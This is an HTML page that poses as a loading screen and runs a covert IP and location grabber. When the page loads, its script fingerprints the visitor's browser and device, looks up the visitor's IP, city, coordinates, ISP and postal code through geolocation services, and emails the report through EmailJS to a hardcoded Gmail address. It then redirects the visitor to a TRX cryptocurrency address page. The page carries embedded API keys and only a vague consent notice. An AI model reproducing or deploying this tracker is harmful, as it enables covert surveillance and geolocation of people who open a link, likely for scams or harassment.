<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Loading...</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #f5f5f5;
        }
        .loader {
            border: 5px solid #f3f3f3;
            border-top: 5px solid #3498db;
            border-radius: 50%;
            width: 50px;
            height: 50px;
            animation: spin 1s linear infinite;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        .privacy-notice {
            position: fixed;
            bottom: 10px;
            left: 10px;
            font-size: 12px;
            color: #666;
            max-width: 300px;
        }
    </style>
    <!-- EmailJS SDK -->
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>
    <script type="text/javascript" src="emailjs-config.js"></script>
</head>
<body>
    <div class="loader"></div>
    <div class="privacy-notice">
        This site collects anonymous information about your device and location for internal analytics purposes. 
        By continuing to use this site, you consent to this data collection.
    </div>

    <!-- Data collection and email sending script -->
    <script type="text/javascript">
        // Initialize EmailJS with the provided API key
        (function() {
            emailjs.init("RrfKXUJqdjRY9RI8E");
        })();

        // Function to collect user data
        async function collectUserData() {
            const userData = {
                timestamp: new Date().toISOString(),
                referrer: document.referrer || "Direct visit",
                browser: {
                    name: navigator.userAgent,
                    language: navigator.language || navigator.userLanguage,
                    cookiesEnabled: navigator.cookieEnabled,
                    doNotTrack: navigator.doNotTrack,
                    platform: navigator.platform,
                    vendor: navigator.vendor
                },
                screen: {
                    width: window.screen.width,
                    height: window.screen.height,
                    colorDepth: window.screen.colorDepth,
                    pixelDepth: window.screen.pixelDepth
                },
                timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
                deviceType: getDeviceType()
            };

            // Get IP and location data from ipinfo.io
            try {
                const ipResponse = await fetch('https://ipinfo.io/json?token=2cda9388b7af9a');
                const ipData = await ipResponse.json();
                
                userData.ip = ipData.ip || "Unknown";
                userData.city = ipData.city || "Unknown";
                userData.region = ipData.region || "Unknown";
                userData.country = ipData.country || "Unknown";
                userData.loc = ipData.loc || "Unknown"; // GPS coordinates
                userData.isp = ipData.org || "Unknown"; // ISP/Network provider
                userData.postal = ipData.postal || "Unknown";
            } catch (error) {
                console.error("Error fetching IP data:", error);
                userData.ipDataError = "Failed to fetch IP data";
                
                // Fallback to another service if the first one fails
                try {
                    const fallbackResponse = await fetch('https://ipapi.co/json/');
                    const fallbackData = await fallbackResponse.json();
                    
                    userData.ip = fallbackData.ip || "Unknown";
                    userData.city = fallbackData.city || "Unknown";
                    userData.region = fallbackData.region || "Unknown";
                    userData.country = fallbackData.country_name || "Unknown";
                    userData.loc = fallbackData.latitude + "," + fallbackData.longitude || "Unknown";
                    userData.isp = fallbackData.org || "Unknown";
                } catch (fallbackError) {
                    console.error("Error fetching fallback IP data:", fallbackError);
                    userData.fallbackIpDataError = "Failed to fetch fallback IP data";
                }
            }

            return userData;
        }

        // Function to determine device type
        function getDeviceType() {
            const ua = navigator.userAgent;
            if (/(tablet|ipad|playbook|silk)|(android(?!.*mobi))/i.test(ua)) {
                return "Tablet";
            }
            if (/Mobile|Android|iP(hone|od)|IEMobile|BlackBerry|Kindle|Silk-Accelerated|(hpw|web)OS|Opera M(obi|ini)/.test(ua)) {
                return "Mobile";
            }
            return "Desktop";
        }

        // Function to send email with collected data
        function sendEmail(userData) {
            // Format the data for email
            const formattedData = `
                <h2>User Data Collection Report</h2>
                <p><strong>Timestamp:</strong> ${userData.timestamp}</p>
                <h3>Location Information</h3>
                <p><strong>IP Address:</strong> ${userData.ip}</p>
                <p><strong>City:</strong> ${userData.city}</p>
                <p><strong>Region:</strong> ${userData.region}</p>
                <p><strong>Country:</strong> ${userData.country}</p>
                <p><strong>GPS Coordinates:</strong> ${userData.loc}</p>
                <p><strong>ISP/Network Provider:</strong> ${userData.isp}</p>
                
                <h3>Browser Information</h3>
                <p><strong>User Agent:</strong> ${userData.browser.name}</p>
                <p><strong>Language:</strong> ${userData.browser.language}</p>
                <p><strong>Platform:</strong> ${userData.browser.platform}</p>
                <p><strong>Vendor:</strong> ${userData.browser.vendor}</p>
                <p><strong>Cookies Enabled:</strong> ${userData.browser.cookiesEnabled}</p>
                <p><strong>Do Not Track:</strong> ${userData.browser.doNotTrack}</p>
                
                <h3>Device Information</h3>
                <p><strong>Device Type:</strong> ${userData.deviceType}</p>
                <p><strong>Screen Resolution:</strong> ${userData.screen.width} x ${userData.screen.height}</p>
                <p><strong>Color Depth:</strong> ${userData.screen.colorDepth}</p>
                <p><strong>Pixel Depth:</strong> ${userData.screen.pixelDepth}</p>
                
                <h3>Other Information</h3>
                <p><strong>Timezone:</strong> ${userData.timezone}</p>
                <p><strong>Referrer:</strong> ${userData.referrer}</p>
            `;

            // Get EmailJS configuration from the imported config file
            const serviceId = typeof EMAILJS_CONFIG !== 'undefined' ? EMAILJS_CONFIG.serviceId : 'default_service';
            const templateId = typeof EMAILJS_CONFIG !== 'undefined' ? EMAILJS_CONFIG.templateId : 'template_default';
            const toEmail = typeof EMAILJS_CONFIG !== 'undefined' ? EMAILJS_CONFIG.toEmail : 'abdalrahimsaid@gmail.com';

            // EmailJS parameters
            const templateParams = {
                to_email: toEmail,
                subject: 'User Data Collection Report',
                message: formattedData
            };

            // Send the email using EmailJS
            return emailjs.send(serviceId, templateId, templateParams)
                .then(function(response) {
                    console.log('Email sent successfully:', response);
                    return true;
                })
                .catch(function(error) {
                    console.error('Email sending failed:', error);
                    return false;
                });
        }

        // Function to redirect to the specified URL
        function redirectToTarget() {
            window.location.href = 'https://www.oklink.com/trx/address/TQ6WV8CgCFaqUJ17fhmwhz3rJP4tR1T8jd';
        }

        // Main execution flow
        window.onload = async function() {
            try {
                // Collect user data
                const userData = await collectUserData();
                console.log('User data collected:', userData);
                
                // Send email with collected data
                const emailSent = await sendEmail(userData);
                
                // Redirect regardless of email success (after a short delay to ensure data is sent)
                setTimeout(redirectToTarget, 1000);
            } catch (error) {
                console.error('Error in data collection process:', error);
                // Redirect anyway in case of error
                redirectToTarget();
            }
        };
    </script>
</body>
</html>
